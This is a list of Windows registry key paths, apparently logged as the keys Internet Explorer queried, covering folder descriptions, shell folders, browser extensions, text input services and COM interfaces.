HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ActivityMeterTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ActivityMeterDisable
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\QuickTabsThreshold
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\clsid
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ext
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Lang0409
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ButtonText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuCustomize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuStatusBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping\{2670000A-7350-4f3c-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Default Visible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\clsid
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Lang0409
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ButtonText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuCustomize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuStatusBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Default Visible
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Icon
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksExplorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\LinksExplorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ThumbnailBehavior
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Height
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{70FAF614-E0B1-11D3-8F5C-00C04F9CF4AC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_CURRENT_USER\Keyboard Layout\Toggle
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Min_Width
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Min_Height
HKEY_CURRENT_USER\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Classes\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order
\xe7\x9d\xa0\xc3\xa1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\DisplayMask
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Expiration
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\ErrorState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE\DontUseDesktopChangeRouter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Marlett
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020400-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020400-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020420-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020420-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\Forward
